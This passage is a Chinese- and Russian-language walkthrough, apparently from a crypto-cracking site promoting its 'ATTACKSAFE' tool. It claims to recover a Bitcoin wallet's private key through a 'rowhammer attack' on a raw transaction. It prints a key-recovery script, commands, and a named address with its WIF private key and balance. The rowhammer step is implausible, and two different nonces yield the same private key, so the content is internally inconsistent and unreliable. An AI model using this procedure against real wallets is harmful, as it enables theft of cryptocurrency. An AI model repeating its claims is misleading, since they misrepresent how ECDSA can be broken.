Z = 0x6b709c60c5357b397ed916dd014b7ce92ead05508b173b45f20066d23c6720f6
R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
point2gen = (0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935 , 0xb05023fec1068addab6d25f08d358e6f25edd83094ac730dcb7124ef3f662af7)
ВСЕ ВЕРНО!
K = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:18vXv21kk8PfN4KRX5i19QvDRM855qheQ
讓我們使用 Python腳本: calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
S = 0x0cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f65274340
Z = 0x6b709c60c5357b397ed916dd014b7ce92ead05508b173b45f20066d23c6720f6
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566
讓我們打開bitaddress並檢查:
ADDR: 18vXv21kk8PfN4KRX5i19QvDRM855qheQ
WIF: L5UYkyYNJDaJTrTZdgWUjPBx1EdgSCjoqxLdqgnQvmcAqMVZnQUh
HEX: f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566

Приватный ключ найден!

www.blockchain.com/btc/address/18vXv21kk8PfN4KRX5i19QvDRM855qheQ
BALANCE: $ 683.49
丟失 BTC 硬幣的潛在威脅在於比特幣區塊鏈交易的嚴重漏洞,因此我們強烈建議大家始終更新軟件並僅使用經過驗證的設備。
通過詳細的密碼分析,我們還在15002f0dc4d2b3f747da8f24a2b994fd86d47db29f682204929c66d7bd52cd42中發現了同一比特幣地址的嚴重漏洞 TXID:
為攻擊準備 RawTX
18vXv21kk8PfN4KRX5i19QvDRM855qheQ

RawTX = 0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000
現在我們需要從所有易受攻擊的交易中獲取所有的 R、S、Z 值
讓我們使用 breakECDSA.py 腳本
python2 breakECDSA.py 0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000

R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
S = 0x5fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c71
Z = 0xed1d33e82c50d2e9567cee7c1bda9ebee64509fb0575bf144779f81dd1dbf42c
要從易受攻擊的 ECDSA 簽名交易中獲取密鑰,讓我們將數據添加RawTX
到文本文檔並將其保存為文件RawTX.txt
0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000
-tool rowhammer_attack
使用軟件啟動“ATTACKSAFE SOFTWARE”
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

我們發起了這次攻擊-tool rowhammer_attack
並將結果保存到一個文件中SecretKey.txt
現在看到成功的結果,打開文件SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
RawTX = 0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000
我們看到一個銘文"Deployments ECDSA"
,表示比特幣區塊鏈交易中存在嚴重漏洞。
SecretKey значение в формате HEX, это и есть наш секретный ключ "K" (NONCE):
K = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
讓我們用Python腳本檢查一下point2gen.py
讓我們使用ECPy橢圓曲線庫:
現在讓我們通過指定運行腳本 секретный ключ "K" (NONCE)
:
python3 point2gen.py 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d

(0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a , 0x86fe84a8fe36d81088a807db2ff8e7b810cf0104118c527bc06d36dd1688befd)
EC (secp256k1)
檢查具有簽名值的點的坐標R
R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
S = 0x5fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c71
Z = 0xed1d33e82c50d2e9567cee7c1bda9ebee64509fb0575bf144779f81dd1dbf42c
R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
point2gen = (0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a , 0x86fe84a8fe36d81088a807db2ff8e7b810cf0104118c527bc06d36dd1688befd)
ВСЕ ВЕРНО!
K = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
現在知道了密鑰,我們可以得到比特幣錢包的私鑰:18vXv21kk8PfN4KRX5i19QvDRM855qheQ
讓我們使用 Python腳本: calculate.py
> > > 獲取私鑰
讓我們打開代碼並添加簽名的所有值K, R, S, Z
def h(n):
return hex(n).replace("0x","")
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
S = 0x5fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c71
Z = 0xed1d33e82c50d2e9567cee7c1bda9ebee64509fb0575bf144779f81dd1dbf42c
print (h((((S * K) - Z) * modinv(R,N)) % N))
該腳本將使用以下公式計算私鑰:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
讓我們運行腳本:
python3 calculate.py

PrivKey = f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566
讓我們打開bitaddress並檢查:
ADDR: 18vXv21kk8PfN4KRX5i19QvDRM855qheQ
WIF: L5UYkyYNJDaJTrTZdgWUjPBx1EdgSCjoqxLdqgnQvmcAqMVZnQUh
HEX: f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566

Приватный ключ найден!

www.blockchain.com/btc/address/18vXv21kk8PfN4KRX5i19QvDRM855qheQ
BALANCE: $ 683.49
電報:https://t.me/cryptodeeptech
視頻素材:https://youtu.be/lfYPcXPzLjE
來源:https://cryptodeep.ru/rowhammer-attack
